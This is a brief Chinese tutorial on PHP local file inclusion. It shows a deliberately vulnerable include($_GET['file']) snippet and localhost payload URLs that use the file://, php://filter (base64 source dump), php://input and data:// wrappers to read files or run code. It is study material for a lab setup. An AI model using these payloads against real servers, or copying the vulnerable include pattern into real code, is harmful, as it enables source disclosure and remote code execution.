一、file://
用於訪問本地系統文件,需要知道文件的絕對路徑
1 <?php 2 include($_GET['file']); 3 ?>
然后傳參http://127.0.0.1/1/php.php?file=file://D:\\phpstudy_pro\\WWW\\c.txt
二、 php://filter
用於讀取文件源代碼,並將base64編碼之后的源代碼輸出
http://127.0.0.1/1/php.php?file=php://filter/read=convert.base64-encode/resource=c.txt
PD9waHANCnBocGluZm8oKTsgDQo/Pg== 即為<?php phpinfo();?>的base64編碼
三、php://input
可以訪問請求的原始數據的只讀流,這里 allow_url_include 需要設置為 On
然后可以以post形式執行php代碼
四、data://
這里 allow_url_include 和 allow_url_fopen 都需要設置為 On
